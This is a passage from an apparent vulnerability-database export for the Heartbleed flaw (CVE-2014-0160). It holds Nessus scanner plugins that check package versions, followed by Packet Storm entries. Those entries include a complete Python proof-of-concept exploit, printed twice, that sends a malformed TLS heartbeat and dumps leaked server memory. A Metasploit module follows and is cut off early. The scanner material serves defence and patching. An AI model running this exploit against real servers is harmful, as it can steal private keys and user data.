"2021-01-12T10:12:41", "description": "pull in upstream patch for CVE-2014-0160", "edition": 11, "published": "2014-04-09T00:00:00", "title": "Fedora 19 : openssl-1.0.1e-37.fc19.1 (2014-4910)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-09T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:19", "p-cpe:/a:fedoraproject:fedora:openssl"], "id": "FEDORA_2014-4910.NASL", "href": "https://www.tenable.com/plugins/nessus/73430", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 
2014-4910.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73430);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_xref(name:\"FEDORA\", value:\"2014-4910\");\n\n script_name(english:\"Fedora 19 : openssl-1.0.1e-37.fc19.1 (2014-4910)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\"pull in upstream patch for CVE-2014-0160\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1085065\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-April/131291.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cfcceed5\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssl package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'OpenSSL Heartbeat Information Leak');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/09\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"openssl-1.0.1e-37.fc19.1\")) flag++;\n\n\nif (flag)\n{\n report = rpm_report_get();\n\n if(!egrep(pattern:\"package installed.+openssl[^0-9]*\\-1\\.0\\.1\", string:report)) exit(0, \"The remote host does not use OpenSSL 1.0.1\");\n\n if (report_verbosity > 0) security_hole(port:0, extra:report);\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.4, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:N"}}, {"lastseen": "2021-01-12T10:12:43", "description": "New upstream release Supports OpenSSL DLLs 1.0.1g. Fixes to take care\nof OpenSSL's TLS heartbeat read overrun (CVE-2014-0160).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 11, "published": "2014-04-30T00:00:00", "title": "Fedora 20 : stunnel-5.01-1.fc20 (2014-5321)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-30T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:stunnel", "cpe:/o:fedoraproject:fedora:20"], "id": "FEDORA_2014-5321.NASL", "href": "https://www.tenable.com/plugins/nessus/73775", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-5321.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73775);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_xref(name:\"FEDORA\", value:\"2014-5321\");\n\n script_name(english:\"Fedora 20 : stunnel-5.01-1.fc20 (2014-5321)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New upstream release Supports OpenSSL DLLs 1.0.1g. Fixes to take care\nof OpenSSL,s TLS heartbeat read overrun (CVE-2014-0160).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-April/132297.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6e63c49d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected stunnel package.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:stunnel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"stunnel-5.01-1.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"stunnel\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-01T03:15:40", "description": "The RPM installation of HP Version Control Agent (VCA) on the remote\nLinux host is version 7.2.2, 7.3.0, or 7.3.1. It is, therefore,\naffected by an information disclosure vulnerability.\n\nAn out-of-bounds read error, known as the 'Heartbleed Bug', exists\nrelated to handling TLS heartbeat extensions that could allow an\nattacker to obtain sensitive information such as primary key material,\nsecondary key material, and other protected content.", "edition": 26, "published": "2014-08-06T00:00:00", "title": "HP Version Control Agent (VCA) Heartbeat Information Disclosure (Heartbleed)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:hp:version_control_agent"], "id": "HP_VCA_SSRT101531-RHEL.NASL", "href": "https://www.tenable.com/plugins/nessus/77022", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77022);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/07/12 19:01:16\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n 
script_xref(name:\"CERT\", value:\"720951\");\n script_xref(name:\"EDB-ID\", value:\"32745\");\n script_xref(name:\"EDB-ID\", value:\"32764\");\n script_xref(name:\"EDB-ID\", value:\"32791\");\n script_xref(name:\"EDB-ID\", value:\"32998\");\n script_xref(name:\"HP\", value:\"emr_na-c04262472\");\n script_xref(name:\"HP\", value:\"HPSBMU03020\");\n script_xref(name:\"HP\", value:\"SSRT101531\");\n\n script_name(english:\"HP Version Control Agent (VCA) Heartbeat Information Disclosure (Heartbleed)\");\n script_summary(english:\"Checks the version of the VCA package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains software that is affected by an information\ndisclosure vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The RPM installation of HP Version Control Agent (VCA) on the remote\nLinux host is version 7.2.2, 7.3.0, or 7.3.1. It is, therefore,\naffected by an information disclosure vulnerability.\n\nAn out-of-bounds read error, known as the 'Heartbleed Bug', exists\nrelated to handling TLS heartbeat extensions that could allow an\nattacker to obtain sensitive information such as primary key material,\nsecondary key material, and other protected content.\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to VCA 7.3.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n # https://h20565.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04262472\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9ffb6dc\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.heartbleed.com\");\n 
script_set_attribute(attribute:\"see_also\", value:\"https://eprint.iacr.org/2014/140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n \n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/08/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:version_control_agent\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"ppc\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\n# These are the only versions the software is supported\n# however you can install it on later versions. 
So\n# only check non-supported versions if paranoia is on.\nif (\n report_paranoia < 2 &&\n !ereg(pattern:\"release [3-6]($|[^0-9])\", string:release)\n) audit(AUDIT_OS_NOT, \"Red Hat 3 / 4 / 5 / 6\");\n\nrpms = get_kb_item_or_exit(\"Host/RedHat/rpm-list\");\nif (\"hpvca-\" >!< rpms) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"HP Version Control Agent\");\n\n# Get the RPM version\nmatch = eregmatch(string:rpms, pattern:\"(^|\\n)hpvca-(\\d+\\.\\d+\\.\\d+-\\d+)\");\nif (isnull(match)) audit(AUDIT_VER_FAIL,\"HP Version Control Agent\");\n\nversion = match[2];\nversion = ereg_replace(string:version, replace:\".\", pattern:\"-\");\n\nfix = \"7.3.2.0\";\n\n# These specific version lines are affected\nif (\n version =~ \"^7\\.2\\.2\\.\" ||\n version =~ \"^7\\.3\\.[0-1]\\.\"\n)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n}\nelse audit(AUDIT_PACKAGE_NOT_AFFECTED, \"HP Version Control Agent\");\n", "cvss": {"score": 9.4, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:N"}}], "packetstorm": [{"lastseen": "2016-12-05T22:25:07", "description": "", "published": "2014-04-08T00:00:00", "type": "packetstorm", "title": "OpenSSL TLS Heartbeat Extension Memory Disclosure", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-08T00:00:00", "id": "PACKETSTORM:126065", "href": "https://packetstormsecurity.com/files/126065/OpenSSL-TLS-Heartbeat-Extension-Memory-Disclosure.html", "sourceData": "`#!/usr/bin/python \n \n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) \n# The author disclaims copyright to this source code. 
\n \nimport sys \nimport struct \nimport socket \nimport time \nimport select \nimport re \nfrom optparse import OptionParser \n \noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') \noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') \n \ndef h2bin(x): \nreturn x.replace(' ', '').replace('\\n', '').decode('hex') \n \nhello = h2bin(''' \n16 03 02 00 dc 01 00 00 d8 03 02 53 \n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf \nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 \n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 \n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c \nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 \nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 \nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c \nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 \n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 \n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 \n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 \n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 \n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 \n00 0f 00 01 01 \n''') \n \nhb = h2bin(''' \n18 03 02 00 03 \n01 40 00 \n''') \n \ndef hexdump(s): \nfor b in xrange(0, len(s), 16): \nlin = [c for c in s[b : b + 16]] \nhxdat = ' '.join('%02X' % ord(c) for c in lin) \npdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin) \nprint ' %04x: %-48s %s' % (b, hxdat, pdat) \nprint \n \ndef recvall(s, length, timeout=5): \nendtime = time.time() + timeout \nrdata = '' \nremain = length \nwhile remain > 0: \nrtime = endtime - time.time() \nif rtime < 0: \nreturn None \nr, w, e = select.select([s], [], [], 5) \nif s in r: \ndata = s.recv(remain) \n# EOF? 
\nif not data: \nreturn None \nrdata += data \nremain -= len(data) \nreturn rdata \n \n \ndef recvmsg(s): \nhdr = recvall(s, 5) \nif hdr is None: \nprint 'Unexpected EOF receiving record header - server closed connection' \nreturn None, None, None \ntyp, ver, ln = struct.unpack('>BHH', hdr) \npay = recvall(s, ln, 10) \nif pay is None: \nprint 'Unexpected EOF receiving record payload - server closed connection' \nreturn None, None, None \nprint ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) \nreturn typ, ver, pay \n \ndef hit_hb(s): \ns.send(hb) \nwhile True: \ntyp, ver, pay = recvmsg(s) \nif typ is None: \nprint 'No heartbeat response received, server likely not vulnerable' \nreturn False \n \nif typ == 24: \nprint 'Received heartbeat response:' \nhexdump(pay) \nif len(pay) > 3: \nprint 'WARNING: server returned more data than it should - server is vulnerable!' \nelse: \nprint 'Server processed malformed heartbeat, but did not return any extra data.' \nreturn True \n \nif typ == 21: \nprint 'Received alert:' \nhexdump(pay) \nprint 'Server returned error, likely not vulnerable' \nreturn False \n \ndef main(): \nopts, args = options.parse_args() \nif len(args) < 1: \noptions.print_help() \nreturn \n \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nprint 'Connecting...' \nsys.stdout.flush() \ns.connect((args[0], opts.port)) \nprint 'Sending Client Hello...' \nsys.stdout.flush() \ns.send(hello) \nprint 'Waiting for Server Hello...' \nsys.stdout.flush() \nwhile True: \ntyp, ver, pay = recvmsg(s) \nif typ == None: \nprint 'Server closed connection without sending Server Hello.' \nreturn \n# Look for server hello done message. \nif typ == 22 and ord(pay[0]) == 0x0E: \nbreak \n \nprint 'Sending heartbeat request...' 
\nsys.stdout.flush() \ns.send(hb) \nhit_hb(s) \n \nif __name__ == '__main__': \nmain() \n \n \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/126065/openssltls-disclose.txt"}, {"lastseen": "2016-12-05T22:16:50", "description": "", "published": "2014-04-08T00:00:00", "type": "packetstorm", "title": "Heartbleed Proof Of Concept", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-08T00:00:00", "id": "PACKETSTORM:126070", "href": "https://packetstormsecurity.com/files/126070/Heartbleed-Proof-Of-Concept.html", "sourceData": "`#!/usr/bin/python \n \n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) \n# The author disclaims copyright to this source code. \n \nimport sys \nimport struct \nimport socket \nimport time \nimport select \nimport re \nfrom optparse import OptionParser \n \noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') \noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') \n \ndef h2bin(x): \nreturn x.replace(' ', '').replace('\\n', '').decode('hex') \n \nhello = h2bin(''' \n16 03 02 00 dc 01 00 00 d8 03 02 53 \n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf \nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 \n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 \n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c \nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 \nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 \nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c \nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 \n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 \n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 \n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 \n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 \n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 \n00 0f 00 01 
01 \n''') \n \nhb = h2bin(''' \n18 03 02 00 03 \n01 40 00 \n''') \n \ndef hexdump(s): \nfor b in xrange(0, len(s), 16): \nlin = [c for c in s[b : b + 16]] \nhxdat = ' '.join('%02X' % ord(c) for c in lin) \npdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin) \nprint ' %04x: %-48s %s' % (b, hxdat, pdat) \nprint \n \ndef recvall(s, length, timeout=5): \nendtime = time.time() + timeout \nrdata = '' \nremain = length \nwhile remain > 0: \nrtime = endtime - time.time() \nif rtime < 0: \nreturn None \nr, w, e = select.select([s], [], [], 5) \nif s in r: \ndata = s.recv(remain) \n# EOF? \nif not data: \nreturn None \nrdata += data \nremain -= len(data) \nreturn rdata \n \n \ndef recvmsg(s): \nhdr = recvall(s, 5) \nif hdr is None: \nprint 'Unexpected EOF receiving record header - server closed connection' \nreturn None, None, None \ntyp, ver, ln = struct.unpack('>BHH', hdr) \npay = recvall(s, ln, 10) \nif pay is None: \nprint 'Unexpected EOF receiving record payload - server closed connection' \nreturn None, None, None \nprint ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) \nreturn typ, ver, pay \n \ndef hit_hb(s): \ns.send(hb) \nwhile True: \ntyp, ver, pay = recvmsg(s) \nif typ is None: \nprint 'No heartbeat response received, server likely not vulnerable' \nreturn False \n \nif typ == 24: \nprint 'Received heartbeat response:' \nhexdump(pay) \nif len(pay) > 3: \nprint 'WARNING: server returned more data than it should - server is vulnerable!' \nelse: \nprint 'Server processed malformed heartbeat, but did not return any extra data.' \nreturn True \n \nif typ == 21: \nprint 'Received alert:' \nhexdump(pay) \nprint 'Server returned error, likely not vulnerable' \nreturn False \n \ndef main(): \nopts, args = options.parse_args() \nif len(args) < 1: \noptions.print_help() \nreturn \n \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nprint 'Connecting...' 
\nsys.stdout.flush() \ns.connect((args[0], opts.port)) \nprint 'Sending Client Hello...' \nsys.stdout.flush() \ns.send(hello) \nprint 'Waiting for Server Hello...' \nsys.stdout.flush() \nwhile True: \ntyp, ver, pay = recvmsg(s) \nif typ == None: \nprint 'Server closed connection without sending Server Hello.' \nreturn \n# Look for server hello done message. \nif typ == 22 and ord(pay[0]) == 0x0E: \nbreak \n \nprint 'Sending heartbeat request...' \nsys.stdout.flush() \ns.send(hb) \nhit_hb(s) \n \nif __name__ == '__main__': \nmain() \n \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/126070/ssltest.py.txt"}, {"lastseen": "2016-12-05T22:22:30", "description": "", "published": "2014-04-10T00:00:00", "type": "packetstorm", "title": "OpenSSL Heartbeat (Heartbleed) Information Leak", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-10T00:00:00", "id": "PACKETSTORM:126101", "href": "https://packetstormsecurity.com/files/126101/OpenSSL-Heartbeat-Heartbleed-Information-Leak.html", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Auxiliary \n \ninclude Msf::Exploit::Remote::Tcp \ninclude Msf::Auxiliary::Scanner \ninclude Msf::Auxiliary::Report \n \nCIPHER_SUITES = [ \n0xc014, # TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA \n0xc00a, # TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA \n0xc022, # TLS_SRP_SHA_DSS_WITH_AES_256_CBC_SHA \n0xc021, # TLS_SRP_SHA_RSA_WITH_AES_256_CBC_SHA \n0x0039, # TLS_DHE_RSA_WITH_AES_256_CBC_SHA \n0x0038, # TLS_DHE_DSS_WITH_AES_256_CBC_SHA \n0x0088, # TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA \n0x0087, # TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA \n0x0087, # TLS_ECDH_RSA_WITH_AES_256_CBC_SHA \n0xc00f, # TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA \n0x0035, # TLS_RSA_WITH_AES_256_CBC_SHA 
\n0x0084, # TLS_RSA_WITH_CAMELLIA_256_CBC_SHA \n0xc012, # TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA \n0xc008, # TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA \n0xc01c, # TLS_SRP_SHA_DSS_WITH_3DES_EDE_CBC_SHA \n0xc01b, # TLS_SRP_SHA_RSA_WITH_3DES_EDE_CBC_SHA \n0x0016, # TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA \n0x0013, # TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA \n0xc00d, # TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA \n0xc003, # TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA \n0x000a, # TLS_RSA_WITH_3DES_EDE_CBC_SHA \n0xc013, # TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA \n0xc009, # TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA \n0xc01f, # TLS_SRP_SHA_DSS_WITH_AES_128_CBC_SHA \n0xc01e, # TLS_SRP_SHA_RSA_WITH_AES_128_CBC_SHA \n0x0033, # TLS_DHE_RSA_WITH_AES_128_CBC_SHA \n0x0032, # TLS_DHE_DSS_WITH_AES_128_CBC_SHA \n0x009a, # TLS_DHE_RSA_WITH_SEED_CBC_SHA \n0x0099, # TLS_DHE_DSS_WITH_SEED_CBC_SHA \n0x0045, # TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA \n0x0044, # TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA \n0xc00e, # TLS_ECDH_RSA_WITH_AES_128_CBC_SHA \n0xc004, # TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA \n0x002f, # TLS_RSA_WITH_AES_128_CBC_SHA \n0x0096, # TLS_RSA_WITH_SEED_CBC_SHA \n0x0041, # TLS_RSA_WITH_CAMELLIA_128_CBC_SHA \n0xc011, # TLS_ECDHE_RSA_WITH_RC4_128_SHA \n0xc007, # TLS_ECDHE_ECDSA_WITH_RC4_128_SHA \n0xc00c, # TLS_ECDH_RSA_WITH_RC4_128_SHA \n0xc002, # TLS_ECDH_ECDSA_WITH_RC4_128_SHA \n0x0005, # TLS_RSA_WITH_RC4_128_SHA \n0x0004, # TLS_RSA_WITH_RC4_128_MD5 \n0x0015, # TLS_DHE_RSA_WITH_DES_CBC_SHA \n0x0012, # TLS_DHE_DSS_WITH_DES_CBC_SHA \n0x0009, # TLS_RSA_WITH_DES_CBC_SHA \n0x0014, # TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA \n0x0011, # TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA \n0x0008, # TLS_RSA_EXPORT_WITH_DES40_CBC_SHA \n0x0006, # TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5 \n0x0003, # TLS_RSA_EXPORT_WITH_RC4_40_MD5 \n0x00ff # Unknown \n] \n \nHANDSHAKE_RECORD_TYPE = 0x16 \nHEARTBEAT_RECORD_TYPE = 0x18 \nALERT_RECORD_TYPE = 0x15 \nTLS_VERSION = { \n'1.0' => 0x0301, \n'1.1' => 0x0302, \n'1.2' => 0x0303 \n} \n \nTTLS_CALLBACKS = { \n'SMTP' => 
